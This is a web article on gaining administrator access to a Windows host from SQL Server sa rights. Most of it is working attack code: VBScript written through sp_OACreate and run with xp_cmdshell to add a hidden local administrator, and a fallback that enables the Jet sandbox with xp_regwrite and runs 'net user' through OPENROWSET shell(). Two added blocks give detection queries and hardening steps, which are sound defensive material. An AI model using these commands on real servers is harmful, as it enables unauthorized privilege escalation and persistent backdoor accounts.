SQL Server SA permission: latest intrusion method

Source: Internet
Author: User

If net.exe and net1.exe have been restricted, an administrator account cannot be added with the net command. VBS, however, can use the WinNT provider of Active Directory Service Interfaces (ADSI) to manage local resources, so an administrator can be added without going through CMD. The code is as follows:
Set wsnetwork = CreateObject("WScript.Network")
OS = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(OS)                             ' bind to the computer through the ADSI interface
Set oe = GetObject(OS & "/Administrators,group")   ' the local Administrators group
Set od = ob.Create("user", "test")                 ' create a user
od.SetPassword "1234"                              ' set the password
od.SetInfo                                         ' save
Set of = GetObject(OS & "/test,user")              ' get the user
oe.Add OS & "/test"                                ' add the user to Administrators

Save the above code as 1.vbs and run it with the command "cscript 1.vbs". This adds a user named test with password 1234 to the system. The code to execute in Query Analyzer is as follows:

DECLARE @o INT, @f INT, @t INT, @ret INT
EXEC sp_OACreate 'Scripting.FileSystemObject', @o OUT
EXEC sp_OAMethod @o, 'CreateTextFile', @f OUT, 'C:\1.vbs', 1
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'Set wsnetwork = CreateObject("WScript.Network")'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'OS = "WinNT://" & wsnetwork.ComputerName'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'Set ob = GetObject(OS)'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'Set oe = GetObject(OS & "/Administrators,group")'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'Set od = ob.Create("user", "test")'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'od.SetPassword "1234"'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'od.SetInfo'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'Set of = GetObject(OS & "/test,user")'
EXEC @ret = sp_OAMethod @f, 'WriteLine', NULL, 'oe.Add OS & "/test"'

After the preceding statements have been executed, run the following line on its own. Do not run it in the same batch as the statements above; otherwise the prompt "c:\1.vbs is being run by another program" appears and the user is not added:

EXEC master..xp_cmdshell 'cscript c:\1.vbs'

If the user is not added, it may be because the password 1234 is too simple and does not meet the server's password complexity policy; choose a password that satisfies the policy and test again. You can also write the code to 1.vbs with echo, in this form:

EXEC master..xp_cmdshell 'echo Set wsnetwork = CreateObject("WScript.Network") > 1.vbs'

However, I don't know why none of the command lines containing the "&" character can be written to 1.vbs; if you are interested, try to solve it.
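From the defender's side, the pattern above (sp_OACreate writing a script to disk, then xp_cmdshell running it) leaves traces in the plan cache and can be captured going forward with Extended Events. The following T-SQL is an added example written for this page, not code from the original article; it assumes VIEW SERVER STATE for the DMV query, ALTER ANY EVENT SESSION for the session, and the session and file names watch_ole_automation / watch_ole_automation.xel are chosen here (the file lands in the instance's default log directory when no path is given).

```sql
-- Added example, not from the original article: find and record calls to the
-- procedures the article relies on (sp_OACreate, sp_OAMethod, xp_cmdshell,
-- xp_regwrite, OPENROWSET with the Jet provider).

-- 1) Retrospective: batches still in the plan cache that call those procedures.
--    Under the default collation LIKE is case-insensitive.
SELECT
    st.text      AS sql_text,
    cp.objtype,
    cp.usecounts
FROM sys.dm_exec_cached_plans AS cp
CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) AS st
WHERE st.text LIKE '%sp_OACreate%'
   OR st.text LIKE '%sp_OAMethod%'
   OR st.text LIKE '%xp_cmdshell%'
   OR st.text LIKE '%xp_regwrite%'
   OR st.text LIKE '%Microsoft.Jet.OLEDB%';

-- 2) Ongoing: an Extended Events session that records who ran such a batch,
--    from which host and application, together with the full batch text.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = N'watch_ole_automation')
    DROP EVENT SESSION [watch_ole_automation] ON SERVER;
GO
CREATE EVENT SESSION [watch_ole_automation] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.client_hostname, sqlserver.client_app_name,
            sqlserver.server_principal_name, sqlserver.session_id)
    WHERE sqlserver.like_i_sql_unicode_string([batch_text], N'%sp_OA%')
       OR sqlserver.like_i_sql_unicode_string([batch_text], N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string([batch_text], N'%xp_regwrite%')
       OR sqlserver.like_i_sql_unicode_string([batch_text], N'%OPENROWSET%')
),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.client_hostname, sqlserver.client_app_name,
            sqlserver.server_principal_name, sqlserver.session_id)
    WHERE [object_name] = N'sp_OACreate'
       OR [object_name] = N'xp_cmdshell'
       OR [object_name] = N'xp_regwrite'
)
ADD TARGET package0.event_file (SET filename = N'watch_ole_automation.xel')
WITH (STARTUP_STATE = ON);
GO
ALTER EVENT SESSION [watch_ole_automation] ON SERVER STATE = START;
GO

-- 3) Read back what the session has captured so far.
SELECT CAST(event_data AS XML) AS event_data
FROM sys.fn_xe_file_target_read_file('watch_ole_automation*.xel', NULL, NULL, NULL);
```

The plan-cache query only sees what has not yet been evicted, so it is a quick triage step rather than an audit trail; the event session is what gives a durable record, and on a server where these procedures have a legitimate use the batch_text filter can be narrowed to the hosts or logins that are expected to call them.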

When xp_cmdshell and its related dynamic link libraries have been removed, the Jet sandbox mode offers a way around the trouble that causes. For security reasons the sandbox mode is disabled by default, so xp_regwrite is needed to enable it:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1

Then use the sandbox's shell() function to add a user named test with password 1234 to the system:

SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias.mdb', 'SELECT shell("cmd.exe /c net user test 1234 /add")')

SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias.mdb', 'SELECT shell("cmd.exe /c net localgroup Administrators test /add")')

Different operating systems keep this database at different paths, so adjust the path as needed.
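Everything on this page depends on three server options (xp_cmdshell, Ole Automation Procedures, Ad Hoc Distributed Queries) and on the Jet SandBoxMode registry value. The following T-SQL is an added example written for this page, not code from the original article: it reads the current state of each, turns the options off, restores the sandbox value, and checks the sa login. It assumes sysadmin membership and that the Jet key lives at the path the article uses (on a 64-bit OS the 32-bit Jet 4.0 key is under Wow6432Node instead). The SandBoxMode meanings are taken from the Jet documentation: 3, the default, sandboxes every host; 1 leaves non-Access hosts such as SQL Server unsandboxed, which is what makes shell() callable.

```sql
-- Added example, not from the original article: audit and remove the settings
-- the article relies on. Run as sysadmin.

-- 1) What is currently enabled? value_in_use = 1 means the option is on.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures', N'Ad Hoc Distributed Queries');

-- 2) Turn all three off. 'show advanced options' is required to address them.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;                  -- no OS shell from T-SQL
EXEC sp_configure 'Ole Automation Procedures', 0;    -- no sp_OACreate / sp_OAMethod
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;   -- no ad hoc OPENROWSET / OPENDATASOURCE
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3) Read the Jet SandBoxMode value the article changes with xp_regwrite,
--    and put it back to the restrictive default if it has been lowered.
DECLARE @sandbox INT;
EXEC master.dbo.xp_regread
    @rootkey    = N'HKEY_LOCAL_MACHINE',
    @key        = N'SOFTWARE\Microsoft\Jet\4.0\Engines',
    @value_name = N'SandBoxMode',
    @value      = @sandbox OUTPUT;
SELECT @sandbox AS jet_sandbox_mode;                  -- anything other than 3 deserves a look
IF @sandbox IS NOT NULL AND @sandbox <> 3
    EXEC master.dbo.xp_regwrite
        N'HKEY_LOCAL_MACHINE', N'SOFTWARE\Microsoft\Jet\4.0\Engines',
        N'SandBoxMode', N'REG_DWORD', 3;

-- 4) The sa login itself: confirm it is disabled (or disable it), and list
--    every sysadmin member so the set can be kept small.
SELECT name, is_disabled
FROM sys.server_principals
WHERE sid = 0x01;                                     -- sa always has SID 0x01
ALTER LOGIN [sa] DISABLE;

SELECT sp.name AS sysadmin_member
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals AS sp ON sp.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';
```

Re-run the first SELECT after RECONFIGURE to confirm value_in_use is 0 for all three options; disabling them is what removes the need to chase individual procedure names, since sp_OACreate, xp_cmdshell and the Jet shell() path are all unavailable once the corresponding option is off and the sandbox value is back at 3.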
